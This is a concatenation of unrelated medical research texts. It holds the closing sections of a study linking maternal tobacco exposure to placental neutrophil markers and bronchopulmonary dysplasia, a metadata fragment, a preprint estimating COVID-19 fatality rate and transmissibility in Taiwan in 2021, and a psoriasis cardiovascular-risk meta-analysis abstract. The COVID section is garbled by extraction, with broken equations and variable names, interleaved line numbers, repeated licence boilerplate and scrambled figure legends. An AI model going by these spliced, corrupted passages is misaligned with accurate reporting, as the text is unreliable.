Bronchopulmonary dysplasia, a disease primarily affecting preterm infants, can be a challenge to manage both acutely and in the long term, as there are many persistent complications affecting patients and their families [24,25]. In this study, we sought to investigate whether tobacco exposure during pregnancy is a risk factor for developing BPD. Specifically, we asked whether neutrophil activation/infiltration occurs in the placentas of tobacco-exposed mothers and whether this infiltration of neutrophils into the placenta is associated with the development of BPD or death, as a composite outcome, in preterm infants.
NGAL, neutrophil gelatinase-associated lipocalin, is a 25 kDa lipocalin originally purified from activated human neutrophils. This molecule is now known to be secreted by a variety of immune cells, hepatocytes, adipocytes, and renal tubular cells [26]. In the placenta, NGAL staining has been associated with inflammation and intra-amniotic infections [26]. NGAL levels in plasma have also been associated with the development of BPD in preterm infants [14]. In this study, we showed for the first time that NGAL staining and NGAL protein levels are higher in the placentas of tobacco-exposed mothers compared to those of non-exposed mothers. Using IHC, NGAL staining was particularly high in the amniochorionic membrane and intervillous space, suggesting the presence of neutrophil activation on both the maternal and fetal surfaces. Levels of NGAL measured by ELISA in placental homogenates were higher in the BPD TE group than in the No BPD TE group. Notably, we found no difference in pathologically diagnosed chorioamnionitis or funisitis between the BPD and No BPD groups, suggesting that the observed elevated NGAL levels could be secondary to maternal tobacco exposure.
The potential physiological mechanisms associating maternal tobacco exposure with increased placental NGAL are currently unknown. However, it is reasonable to assume that tobacco exposure during pregnancy results in increased inflammation and immune cell activation, both systemically and at the placenta [27]. Immune cell activation would result in the release of inflammatory cytokines and chemotactic factors [28], potentially affecting the maturation of the fetal lungs. Previous studies have confirmed an association of elevated levels of pro-inflammatory cytokines (interleukin 6 [IL-6], tumor necrosis factor-alpha [TNF-α], IL-1β, and IL-8) in amniotic fluid 5 days preceding delivery with the development of BPD, suggesting that the mechanism responsible for BPD may begin before birth [29].
To determine whether tobacco exposure is associated with increased inflammation in the placenta, we profiled placental tissue from tobacco-exposed and non-exposed mothers using the nCounter® Immunology NanoString Panel, which includes over 500 immunology genes involved in activation of the inflammatory cascade, including neutrophil, natural killer cell, B cell, and T cell activation, as well as various genes responsible for complement activation. Notably, IL8 and CXCL10 mRNA were significantly upregulated in tobacco-exposed compared to non-exposed placentas. Both genes encode chemokines known to recruit immune cells, including neutrophils, and are associated with inflammation in the placenta [28,30]. Additionally, the S100A8 and S100A9 genes, upregulated in tobacco-exposed placentas, encode inflammatory proteins previously shown to play a role in pregnancy loss and other complications, such as preeclampsia [31]. These expression differences further support our suggestion that maternal tobacco exposure is associated with placental inflammation, at least at the transcript level.
Surprisingly, we found no association between maternal tobacco exposure and the incidence of BPD in preterm infants born <32 weeks gestation. This lack of association could be due to the small sample size, as well as to the multitude of factors known to be involved in the pathogenesis of BPD [24]. Though one previous study showed a potential association of BPD with maternal tobacco exposure, the majority of the literature indicates that maternal smoking during pregnancy is not an independent risk factor for BPD development after controlling for additional variables [6,8,32,33]. With the exception of antepartum hemorrhage, which was significantly more frequent in the composite outcome group than in the No BPD group (46.7% vs. 4.2%; p = 0.003), we found no difference in known risk factors for BPD, including maternal hypertension, PPROM, and chorioamnionitis [8][9][10][11][12]. In line with other studies [7], infants with the composite outcome of BPD or death had a lower gestational age and birth weight compared with infants in the No BPD group. Composite outcome infants also required more medical interventions, such as intubation after birth and medical management of PDA, and more often developed threshold ROP.
Our pilot study is subject to several limitations. First, maternal tobacco exposure status was based on a self-reported questionnaire rather than a biochemical measurement, such as levels of cotinine, a nicotine metabolite. We previously showed that serum cotinine levels were significantly higher in cord blood of self-reported smokers than in cord blood of non-smokers, suggesting that self-reported smoking status may be adequate in our patient population [21]. Second, we did not account for the amount of tobacco exposure (e.g., number of cigarettes smoked per day, or passive versus active smoking) in our results. It is possible that active smoking has a stronger association with placental pathology than passive tobacco exposure. Third, due to the small sample size, we focused on the clinically relevant outcome of moderate to severe BPD and did not adjust for the multiple confounding variables that contribute to the development of BPD. Lastly, our focus in this study was primarily on neutrophil activation; we did not evaluate the effect of tobacco exposure on activation or placental infiltration of other leukocytes.
Conclusions
In conclusion, our study provides evidence that maternal tobacco exposure is associated with neutrophil infiltration into the placenta. One possible implication of this observation is an increased inflammatory environment that could amplify other risk factors, such as chorioamnionitis, preeclampsia, hyperoxia, or mechanical ventilation, resulting in the development of BPD [16]. Additional studies should be carried out focusing on other leukocytes present in the placenta and on the cytokines to which the neonate is exposed that could contribute to inflammatory injury in the developing lungs. Further, a larger study should be carried out to determine whether increased neutrophil infiltration into the placenta due to tobacco exposure is predictive of BPD.
"year": 2022,
"sha1": "779279ea9de1c231bae29629b29770f845df7cec",
"oa_license": "CCBY",
"oa_url": "https://www.mdpi.com/2227-9067/9/3/381/pdf",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "58bb823b7b735ab62e6e5422d4b003258cb3ff17",
"s2fieldsofstudy": [
"Medicine",
"Environmental Science"
],
"extfieldsofstudy": [
"Medicine"
]
} |
Assessment of the fatality rate and transmissibility taking account of undetected cases during an unprecedented COVID-19 surge in Taiwan
Background During the COVID-19 outbreak in Taiwan between May 11 and June 20, 2021, the observed fatality rate (FR) was 5.3%, higher than the global average of 2.1%. The high number of reported deaths suggests that hospital capacity was insufficient. However, many unexplained deaths were subsequently identified as cases, indicating that a number of cases went undetected and hence that the FR was overestimated. Knowing the total number of infected cases allows an accurate estimation of the fatality rate (FR) and effective reproduction number (Rt). Methods After adjusting for reporting delays, we estimated the number of undetected cases using reported deaths that were and were not previously detected. The daily FR and Rt were calculated using the number of total cases (i.e., including undetected cases). A logistic regression model was developed to predict the detection ratio among deaths using selected predictors from daily testing and tracing data. Results The estimated true daily case number at the peak of the outbreak on May 22 was 897, which was 24.3% higher than the reported number, but the difference became less than 4% on June 9 and afterward. After taking account of undetected cases, our estimated mean FR (4.7%) was still high, but the daily rate showed a large decrease from 6.5% on May 19 to 2.8% on June 6. Rt reached a maximum value of 6.4 on May 11, compared to 6.0 estimated using the reported case number. The decreasing proportion of undetected cases was associated with increases in the ratio of the number of tests conducted to reported cases and in the proportion of cases that were contact-traced before symptom onset. Conclusions Increasing testing capacity and tracing efficiency can reduce hidden cases and hence improve epidemiological parameter estimation.
Introduction
Knowing the actual number of coronavirus disease 2019 (COVID-19) cases throughout an outbreak is critical to provide an accurate estimate of epidemiological parameters such as the fatality rate (FR) and effective reproduction number ($R_t$). These parameters aid in making proper public health decisions, assessing health care system performance, and predicting the trend of COVID-19 spread. However, the number of undetected cases can be large and may vary during an outbreak. Limited capacities for contact tracing and testing often result in underestimation of true infections [1,2]. The proportion of undetected cases may decline after such capacities improve. Hence, estimating this constantly changing proportion of undetected cases throughout an outbreak is important.

After several months of zero confirmed community-acquired cases, quarantine exemption for flight crews and super-spreader events in tea parlors in Wanhua in Taipei in late April and early May 2021 triggered a fresh wave of local spread of the Alpha variant [3]. This resulted in 14,005 total reported cases between May 11 and June 20, 2021 [4]. Approximately 5% of cases resulted in death, a higher case fatality rate (CFR) than the global rate (obtained by dividing the total number of deaths by the total number of cases worldwide), which has been consistently below 2.5% since November 16, 2020 [5]. Whether this high CFR was mainly because of insufficient hospital capacity and treatment, or because of a massive proportion of undetected cases, was unknown.

Early in the outbreak, testing capacity was insufficient to cope with the rising cases among initial transmission clusters. The daily number of new cases grew to more than 200 within a week and continued to increase until reaching a plateau at the end of May 2021 (i.e., 596 cases on average per day from May 22 to 28). Because of the emerging outbreak, Taiwan had been under a Level 2 alert since May 11, 2021 [6], followed by escalation to Level 3 restrictions on May 19, 2021 [7], under which people are required to wear masks outdoors, gatherings of more than four people indoors and more than nine people outdoors are banned, and all schools are closed. Social distancing measures reduced individual mobility [8] and effectively lowered $R_t$. At the same time, the daily number of tests conducted continued to increase, presumably allowing more cases to be identified.

During the outbreak, many confirmed cases failed to be detected while alive and were tested only because of their death, indicating that a certain number of undetected cases existed. The number of undetected cases who eventually died (referred to as undetected deaths), together with the detected deaths, allows the total number of infections to be estimated.
Data sources
We collected the date of symptom onset and the testing date for each reported COVID-19 death from May 28 to July 22, 2021, from the Taiwan Centers for Disease Control [9]. The daily number of deaths reported before May 28 was obtained from the media. The daily number of confirmed cases was collected from the Taiwan National Infectious Disease Statistics System [4]. We collected the daily number of tests conducted from the Government Information Open Platform, Taiwan [10,11].
Estimating true total cases and fatality rate
Deaths from COVID-19 were classified into two categories, detected and undetected, depending on whether testing was performed before death (see the schema in Figure 1A). To estimate the true total number of cases, we first considered the following ratio of undetected to detected deaths, expressed through the numbers of detected and undetected cases and their respective FRs:

$$\frac{D_{ud}}{D_{d}} = \frac{N_{ud}(t)\, FR_{ud}}{N_{d}(t)\, FR_{d}(t)}, \qquad (1)$$

where $D_{d}$ is the number of detected deaths and $D_{ud}$ the number of undetected deaths; $N_{d}(t)$ and $N_{ud}(t)$ represent the numbers of cases that are detected and undetected at day $t$, respectively. Here $t$ refers to the reporting date for detected cases or deaths; for undetected cases or deaths, $t$ refers to the adjusted reporting date, such that the reporting delay (i.e., the time elapsed between symptom onset and reporting) is adjusted to be the same as that of detected cases. Thus, $D_{d}(t)$ represents the number of deaths among the detected cases reported at day $t$, and $D_{ud}(t)$ is the number of deaths among the undetected cases whose adjusted reporting date is day $t$. $FR_{d}(t)$, which is likely to be affected by changes in hospital capacity or treatment, represents the daily FR among the detected cases at day $t$.
"# represents the FR among the undetected cases. "# was 119 assumed to be a constant, estimated as the average # ( ) during the initial two weeks (from 120 May 11 to May 24) of the outbreak when the hostpital capacity or treatment was not sufficient. 121 Undetected deaths who are tested later are identified as "late-detected" cases ( $# ) (See Figure 122 1A). We back-projected the number of late-detected cases from their late reporting time to their 123 adjusted reporting date 12 , using the mean and standard deviation of the reporting delay 124 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint among detected cases. Our aim was to estimate "# ( ). After rearrangement, the following 125 formula was derived: 126 The value can be solved because all of the terms on the right are either known or can be 128 estimated. We assumed that most of the undetected deaths were identified as "late-detected" 129 cases ( $# ). Therefore, the number of undetected deaths was approximated by the number of 130 late-detected cases ( "# ≈ $# ) and then the ratio # "! (!) was obtained. At the same time, the 131 proportion of detected deaths (i.e., the detection ratio among death cases; ) was also 132 calculated. Finally, the true number of total cases was derived empirically as the sum of 133 detected and undetected cases (i.e., # + "# ). Note that these ratios among deaths were also 134 predicted by a regression model using data related to testing and tracing and hence a model-135 predicted number of total cases was obtained (see later sections). 136 The FRs of reported cases (including both detected and late-detected cases; # + $# ) and total 137 cases were estimated at the reporting time (or the adjusted reporting time for undetected cases) 138 using the following equations. 139 (3) 140 (4) 141 ()*+(!)# is commonly known as the case fatality rate, and !+!,$ is the infection fatality 142 rate. 143
Estimating the proportion of detected deaths using a predictive model
We predicted the detection ratio among deaths using daily values of five indicators related to testing, tracing, and hospital capacity as candidate predictors: the proportion of cases without contact-tracing delay, the ratio of the number of tests conducted to reported cases, the testing delay, the reporting delay, and the death delay (for definitions, see Figure 2). We calculated the delays in testing, reporting, and death by subtracting the date of symptom onset from the dates of these three events. Testing (the first test) earlier than or on the same day as symptom onset implied that a case was contact-traced without delay. If cases were tested after symptom onset, they were either contact-traced with delay or not contact-traced. The proportion of deaths that were contact-traced without delay was calculated.

To investigate the factors that influence the proportion of detected deaths, we developed a logistic regression model. We assumed that the number of deaths that were previously detected on day $t$ follows a binomial distribution, i.e., $D_{d}(t) \sim \mathrm{Binomial}(D(t), p(t))$, where $p(t)$ is the expected proportion of detected deaths on day $t$. The full predictive model is

$$\mathrm{logit}\, p(t) = \alpha + \beta_{1} R_{tc}(t) + \beta_{2} P_{ctd}(t) + \beta_{3} d_{r}(t) + \beta_{4} d_{t}(t) + \beta_{5} d_{d}(t), \qquad (5)$$

where $R_{tc}$ is the daily ratio of tests conducted to reported cases; $P_{ctd}$ is the daily proportion of cases (among detected deaths) without contact-tracing delay; and $d_{r}$, $d_{t}$, and $d_{d}$ are the daily reporting, testing, and death delays, respectively. $\alpha$ is the intercept and the $\beta_{i}$ are regression coefficients.
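In statsmodels, the binomial GLM of equation (5) takes a two-column response of (detected, undetected) death counts per day. A self-contained sketch with invented numbers, restricted for brevity to the two predictors that end up in the final model:

```python
import pandas as pd
import statsmodels.api as sm

# Invented daily aggregates for demonstration only.
daily = pd.DataFrame({
    "tests_per_case":    [40, 80, 150, 220, 260],
    "prop_no_ct_delay":  [0.30, 0.45, 0.50, 0.60, 0.65],
    "detected_deaths":   [6, 10, 12, 9, 7],
    "undetected_deaths": [5, 3, 1, 1, 0],
})
X = sm.add_constant(daily[["tests_per_case", "prop_no_ct_delay"]])
y = daily[["detected_deaths", "undetected_deaths"]]  # (successes, failures)
fit = sm.GLM(y, X, family=sm.families.Binomial()).fit()
print(fit.params)  # alpha, beta_1, beta_2 on the logit scale
```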
Model selection
To obtain the best model, the variables in equation (5) were added to the model iteratively. First, model fit was measured for each of the variables separately using the Akaike information criterion (AIC) [13]. The model with the lowest AIC value was selected as the best candidate in this batch. Next, we added one additional variable to the candidate model from the remaining four variables. Among the two-variable models, the model with the lowest AIC value was again selected as the best candidate. We likewise obtained the best candidates among the three-variable, four-variable, and full models. The final best model was chosen by comparing the best candidates across batches and taking the one with the lowest AIC.
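The batchwise search can be written as greedy forward selection on AIC; this sketch simplifies the authors' procedure (which compares the best candidates across all batch sizes) by stopping as soon as AIC no longer improves.

```python
import statsmodels.api as sm

def forward_aic(y, X, candidates):
    """Greedy forward selection by AIC for a binomial GLM."""
    remaining, selected = list(candidates), []
    best_aic = float("inf")
    while remaining:
        aics = {v: sm.GLM(y, sm.add_constant(X[selected + [v]]),
                          family=sm.families.Binomial()).fit().aic
                for v in remaining}
        var, aic = min(aics.items(), key=lambda kv: kv[1])
        if aic >= best_aic:
            break                      # adding a variable no longer helps
        best_aic = aic
        selected.append(var)
        remaining.remove(var)
    return selected, best_aic
```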
Model validation
To evaluate whether the predictive model achieved its intended purpose (i.e., to improve the accuracy of epidemiological parameter estimation), we explored the relationship between $R_t$ estimated from the total cases predicted by the best model and daily mobility data. Cases were back-projected to infection time. The result was compared with $R_t$ estimated using total cases that were empirically derived or using reported cases. $R_t$ estimated from four scenarios of infections was compared: (S1) total cases at infection time, estimated using the empirical detection ratio; (S2) total cases at infection time, estimated using the model-predicted detection ratio; (S3) reported cases at infection time; and (S4) reported cases at reporting time.

The mean incubation time for the circulating strain in Taiwan was 3.53 days [17], and we estimated the mean reporting delay as 4.45 days. Assuming equal standard deviations for the two distributions (estimated as 3.93 days for the reporting delay), the distribution of the time between infection and reporting was a gamma distribution with a mean of 7.98 days and a standard deviation of 5.28 days. The mean of this distribution was estimated as the sum of the mean incubation time and the mean confirmation delay, and the standard deviation was obtained by pooling the standard deviations of the two periods:

$$\mu_{w} = \mu_{I} + \mu_{C}, \qquad \sigma_{pooled} = \sqrt{\sigma_{I}^{2} + \sigma_{C}^{2}},$$

where $\mu_{I}$ and $\mu_{C}$ are the mean incubation time and confirmation delay, $\mu_{w}$ is their combined mean, and $\sigma_{pooled}$ represents the pooled standard deviation of the period between infection and reporting.

We then estimated total cases at infection time using the empirical detection ratio (S1) and the model-predicted detection ratio (S2), and reported cases at infection time (S3), using a back-projection method [12]. We set initial conditions for estimating $R_t$: before May 11, we assumed there were 15 cases each day between May 6 and 10, which was the average number of reported cases at infection time during this 5-day period.
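The combined infection-to-reporting delay can be parameterized as a gamma distribution from its moments. One assumption is made explicit here: the reported SD of 5.28 days is reproduced only if the incubation-period SD is taken as 3.53 days (equal to its mean) rather than 3.93 days, so that value is used below.

```python
import numpy as np
from scipy import stats

def gamma_from_moments(mean, sd):
    """Shape and scale of a gamma distribution with the given mean and SD."""
    return (mean / sd) ** 2, sd ** 2 / mean

mu_inc, sd_inc = 3.53, 3.53   # incubation time (SD assumed equal to mean)
mu_rep, sd_rep = 4.45, 3.93   # reporting (confirmation) delay
mu_total = mu_inc + mu_rep                 # 7.98 days
sd_total = np.hypot(sd_inc, sd_rep)        # ~5.28 days
shape, scale = gamma_from_moments(mu_total, sd_total)
delay = stats.gamma(a=shape, scale=scale)  # infection-to-reporting delay
```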
Results
Time-varying FR among true total cases (equation 4) was first quantified after taking undetected cases into account and was compared with that of reported cases. The number of total cases was also predicted using polymerase chain reaction (PCR) testing data (equations 5 and 6). To assess the impact of including undetected cases, we investigated the relationship between $R_t$ generated using total cases and mobility data and then determined whether the relationship improved compared with $R_t$ from reported cases.

After the number of undetected cases was considered, the estimated FR was lower than that using reported cases but was still high during the initial period of the outbreak. The mean FR of total cases was estimated to be 4.7%, lower than the mean FR of 5.3% for reported cases (Figure 1B). The FR increased rapidly from 4.7% and peaked at 6.5% on May 19, but then continued decreasing, reaching 2.8% on June 6. Since then, the rate was generally maintained.

From May 24 to June 3, the 5-day moving average number of reported cases reached a plateau and then declined thereafter (Figure 3A). The estimated true daily case number at the peak of the outbreak on May 22 was 897, which was 24.3% higher than the reported number. The difference became less than 4% on June 9 and afterward.

Until June 20, a total of 105 late-detected cases were reported, indicating many undetected deaths. Similarly, daily detected deaths also reached a plateau around May 24 (Figure 3B). However, the number of late-detected cases (at adjusted reporting time) reached a peak (7 persons per day) on May 21 and started to decline immediately, approaching zero after June 8. This indicated improvement of the detection ratio among deaths. The detection ratio among deaths, which was about 50% initially, exceeded 95% after the end of May (Figure S1B). This ratio was very different from the observed ratio (a V-shaped pattern) without back-projection (Figure S1A).
Predicting detection ratio using testing data
We next investigated whether the improvement in the proportion of detected cases was related to improved testing and tracing capacity. The indicators of capacity are explained by the schematic of individual infection and testing statuses of each case among deaths (for definitions, please refer to Figure 2 and its legend). Depending on the time of testing, a case can be categorized as a detected death (contact-traced without delay, or tested after symptom onset but before death) or an undetected death (tested after death). More efficient contact tracing allowed more cases to be traced and tested before symptom onset, as indicated by the proportion of cases without contact-tracing delay. This proportion fluctuated between 25% and 75% throughout the study period, with an increasing trend from late May (below 50%) to late June (above 60%) (Figure 4A). The testing delay gradually increased, from approximately two days to 4-6 days, until June 14, a few weeks after the outbreak started to decline (Figure 4B). The reporting delay from the day of symptom onset ranged mostly between 2.5 and 7.5 days (Figure 4E), whereas the death delay continued increasing from 5 days to more than 18 days (Figure 4C). The ratio of the number of tests conducted to reported cases increased from less than 50 to more than 200 (Figure 4D), demonstrating the improvement in testing capacity throughout the outbreak.

We compared models, from the most basic to more complex ones, by their AIC values to identify the best-fitting model. The model with the predictors of the proportion of cases without contact-tracing delay and the ratio of tests conducted to reported cases was selected as the best model (Model 2 in Table 1).

The model successfully captured the trend in the proportion of detected deaths (Figure 4F). Twenty of 34 daily values were predicted within the confidence interval. Among the values outside the interval, most fell close to it; only two had errors larger than twice the interval width.

The results suggest that a higher detection ratio among deaths was driven by more cases being contact-traced without delay and by a higher number of tests conducted relative to the number of cases (Table 2).
Comparing effective reproduction number and mobility index
Comparisons were made between $R_t$ estimated using (i) total cases estimated using the empirical detection ratio; (ii) total cases estimated from the model-predicted detection ratio using testing data; and (iii) reported cases only (see Figure 5A,B, Figure S2, and Methods). When the total case number was used, $R_t$ was higher during the earlier dates. The number reached a maximum value of 6.4 on May 11, compared to 6.0 estimated using the reported case number. We further evaluated the relationship between $R_t$ and mobility data during the period when $R_t$ fell from the maximum value to 1 (May 11 to May 24) (Table S1). We found that when the total case number was used (either estimated using the empirical detection ratio or predicted using the testing data), a lower AIC was produced, indicating a better fit to the mobility data.

In summary, the efficiencies of testing and contact tracing changed during the outbreak and were useful in predicting the proportion of undetected cases. After adding the undetected cases, a better estimate of $R_t$ was made and a reduction in the FR was observed.

Discussion

Understanding whether the high FR observed in the recent largest COVID-19 outbreak in Taiwan was attributable to a higher number of undetected cases or to insufficient health care capacity is important to guide interventions to reduce COVID-19 mortality in the future. An important observation is that even after the proportion of undetected cases was included, the average FR was only adjusted to 4.7% from 5.3%, which is still higher than the global average for the same time (i.e., 2.1% in May and June 2021 [5]). However, the daily FR fell to 2.8% on June 6 and remained at this low level, similar to that in the United States (i.e., 2.8% in May and June 2021 [18]). The reduction from the initially high FR can be explained by the improvement in hospital capacity or treatment to accommodate the sudden rise in cases. This is supported by the observation that the duration between symptom onset and death among detected deaths continued increasing from approximately five days to more than two weeks in June.

The number of hidden (undetected) COVID-19 cases often affects the estimation of the transmissibility of the virus and the effectiveness of the non-pharmaceutical interventions (NPIs) implemented. Even though the effects of contact tracing and testing on transmissibility have been studied [19,20], how many hidden cases they cause is unclear. We demonstrated that time-varying detection ratios can be predicted using data on testing and contact tracing. As a result, a more accurate $R_t$ can be obtained, which is likely to be explained better by mobility data. Guidance for implementing NPIs based on changes in mobility can then be provided [8].

We found that the ratio of the number of tests conducted to reported cases, and the proportion of cases that are contact-traced without delay, can be used to "nowcast" the proportion of undetected cases. Because the number of tested samples can quickly reach the capacity limit when the case number is growing, many samples remain untested. Hence, each day, the number of confirmed cases depends largely on how many tests can be performed. A day's delay in testing and confirming a case leads to a day's delay in tracing the close contacts of that case. Furthermore, higher contact-tracing coverage together with a shorter delay in being traced enables more cases to be identified earlier [19,20]. These findings suggest that increasing testing and tracing capacity to identify infections earlier can further reduce hidden cases.

Modelling has been used to estimate the proportion of undetected COVID-19 cases using the observed case number during a specific period (e.g., before or after an intervention) of an outbreak [21,22]. More recently, an approach estimating under-ascertainment by directly comparing model-predicted deaths with recorded excess deaths was used [23]. We checked the number of deaths related to flu and pneumonia illness [9] and found no unusual excess deaths other than the reported COVID-19 deaths during this period. The proportion of undetected cases can also be calculated after incorporating seroprevalence data with the false-negative rates of tests into models [24]. Overall, none of these methods estimates the constantly changing proportion of undetected cases.

Several criteria enabled us to make successful predictions using testing data. First, the number of deaths should be high; if this number is low, the uncertainty in estimating the number of undetected cases becomes high. Second, most of the deaths have to be tested eventually. The Taiwan government has a strong directive to test all sudden death cases; for example, on June 18, it was announced that PCR tests would be performed for all sudden and unexplained deaths [25]. This may not be the case in countries with a large number of excess deaths associated with COVID-19.

In summary, predicting the number of undetected cases as early as possible using testing data can help obtain an $R_t$ with a better relationship with mobility data, thus enabling policymakers to make timely public health decisions using mobility information to contain the outbreak.
303 We found that the ratio of the number of tests conducted to reported cases, and the proportion 304 of cases that are contact traced without delay can be used to "nowcast" the proportion of 305 undetected cases. Because the number of tested samples can quickly reach the capacity limit 306 when the case number is growing, many samples remain untested. Hence, each day, the number 307 of confirmed cases depends largely on how many tests can be performed. A day delay in testing 308 and confirming a case, leads to a day delay in tracing the close contacts of the case. Further 309 more, a higher contact tracing coverage together with a shorter delay of being traced enables 310 more cases to be identified earlier 19,20 . These suggest increasing testing and tracing capacity to 311 identify those infections earlier can reduce hidden cases more. 312 Modelling has been used to estimate the proportion of undetected COVID-19 cases using the 313 observed case number during a specific period (e.g., before or after an intervention) of an 314 outbreak 21,22 . More recently, an approach through estimating under-ascertainment by directly 315 comparing model-predicted death with excess deaths recorded was used 23 . We checked the 316 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint number of deaths related to flu and pneumonia illness 9 and found no unusual excess deaths 317 other than the reported COVID-19 deaths during this period. The proportion of undetected 318 cases can also be calculated after incorporating seroprevalence data with false negative rates 319 of tests into models 24 . Overall, none of these methods estimate the constantly changing 320 proportion of undetected cases. 321 Several criteria enabled us to make successful prediction using testing data. First, the number 322 of deaths should be high. If this number is low, the uncertainty of estimating the number of 323 undetected cases becomes high. Second, most of the deaths have to be tested eventually. 324 Taiwan government has a strong directive to test all sudden death cases; for example, on June 325 18, it was announced that PCR tests would be performed for all sudden and unexplained deaths 326 25 . This may not likely be the case in countries with a large number of excess deaths associated 327 with COVID-19. 328 In summary, predicting the number of undetected cases as early as possible using testing data 329 can help obtain an ! with a better relationship with mobility data, thus enabling policymakers 330 to make timely public health decisions using mobility information to contain the outbreak. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, and its application to aids data. Stat. Med. 10, 1527-1542 (1991). this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, cases (4.7%). Note that the FR of the total cases was higher than that of the reported cases in 419 the first few days because "# was assumed to be same as the mean # between May 11 420 and May 26. 
Data points during the earliest dates when the number of detected or undetected 421 cases was zero are not shown. 422 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. infected case was categorized as Detected if the first testing was performed before death. A 428 case that was tested on the same date of or after death was categorized as Undetected. Among 429 detected cases, we assumed that a case was contact traced without delay if the first testwas 430 performed before symptom onset ; otherwise, contact traced with delay or not contact traced 431 if thewas performed after symptom onset. Testing delay refers to the time between symptom 432 onset and the last test 9 . Similarly, the reporting delay and death delay are defined as the time 433 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint difference between symptom onset and reporting, , and death, , respectively. The reporting 434 time among an undetected death was adjusted to an earlier time to have the same reporting 435 delay as detected deaths. The definitions for each status, , , -, 9 , and D, are listed in the 436 text box. (B) Estimation of total number of COVID-19 cases (sum of detected and 437 undetected) using a regression model. With the best-fitting model (see Table 2), we estimated 438 the percentage of deaths that are detected, ( ). Undetected proportion of cases was estimated 439 based on the relationship between ( ) and fatality rates (see equation 6). Gray dashed lines 440 represent the predictors that were not included in the best-fitting model while estimating ( ). 441 reuse, remix, or adapt this material for any purpose without crediting the original authors. The daily number of new infections was back-projected from the daily number of cases 469 obtained from the detected and empirically estimated undetected cases (green dots; referred to 470 as S1 reporting time (red dots; referred to as S4) is presented in Figure S2. 20 is given in Figure S4. Color codes represent the same definition as in (A). The shaded area 482 represents 95% confidence intervals. 483 484 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, detected deaths among total deaths estimated using the empirical detection ratio. In each plot, 512 dots represent daily numbers that are observed or estimated. Solid lines represent moving 513 average using a 5-day sliding window, centered at day 3. 514 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. Figure S4D. 
522 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. for gamma distribution with mean and standard deviation 12.7 and 5.3 days, respectively. 532 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, The copyright holder has placed this version posted October 30, 2021. ; https://doi.org/10.1101/2021.10.29.21265691 doi: medRxiv preprint 533 Figure S4. Effective reproduction number ! during the entire period between May 6 and June 534 20. S1 and S2 refer to the numbers of total cases at infection time. S3 and S4 refer to the 535 numbers of reported cases at infection and reporting time, respectively. Smooth solid lines 536 represent the estimated mean ! , and shaded regions show the 95% confidence intervals.The 537 dashed line depicts the cutoff value when ! = 1. 538 reuse, remix, or adapt this material for any purpose without crediting the original authors. this preprint (which was not certified by peer review) in the Public Domain. It is no longer restricted by copyright. Anyone can legally share, Table S1. Validation of the estimates of instantaneous reproduction number using mobility 541 adjusted regression model between May 11 and May 24 when ! reached one. The moving 542 average of mobility using a 7-day sliding window, centered at day 4, was considered as the 543 predictor. AIC represents the Akaike information criterion. Δ shows the differences 544 between the smallest AIC and AIC of the ith model. We rechecked the values for an extended 545 period until May 27, when ! reached a minimum. In this case, ! , estimated under scenario 546 S1, showed the best fit of the mobility data with minimum AIC -27.93 (data is not presented 547 in this table), whereas scenario S2 was treated as the second-best with AIC -27.20. The 548 difference between the AIC of these two scenarios was less than one. 549
15085663 | pes2o/s2orc | v3-fos-license | Psoriasis and Major Adverse Cardiovascular Events: A Systematic Review and Meta‐Analysis of Observational Studies
Background Psoriasis is a chronic inflammatory disease that may be associated with increased risk of cardiovascular events, including cardiovascular mortality, myocardial infarction, and stroke. Methods and Results We searched the MEDLINE, EMBASE, and Cochrane Central Register databases for relevant studies in English between January 1, 1980, and January 1, 2012. Extraction was by 3 independent reviewers. Summary incidence, risk ratios (RRs), and confidence intervals (CIs) were calculated using fixed‐effects and random‐effects modeling. Meta‐regression was also performed to identify sources of between‐study variation. Nine studies were included, representing a total of 201 239 patients with mild and 17 415 patients with severe psoriasis. The level of covariate adjustment varied among studies, leading to the possibility of residual confounding. Using the available adjusted effect sizes, mild psoriasis remained associated with a significantly increased risk of myocardial infarction (RR, 1.29; 95% CI, 1.02 to 1.63) and stroke (RR, 1.12; 95% CI, 1.08 to 1.16). Severe psoriasis was associated with a significantly increased risk of cardiovascular mortality (RR, 1.39; 95% CI, 1.11 to 1.74), myocardial infarction (RR, 1.70; 95% CI, 1.32 to 2.18), and stroke (RR, 1.56; 95% CI, 1.32 to 1.84). Based on these risk ratios and the background population event rates, psoriasis is associated with an estimated excess of 11 500 (95% CI, 1169 to 24 407) major adverse cardiovascular events each year. Conclusions Mild and severe psoriasis are associated with an increased risk of myocardial infarction and stroke. Severe psoriasis is also associated with an increased risk of cardiovascular mortality. Future studies should include more complete covariate adjustment and characterization of psoriasis severity.
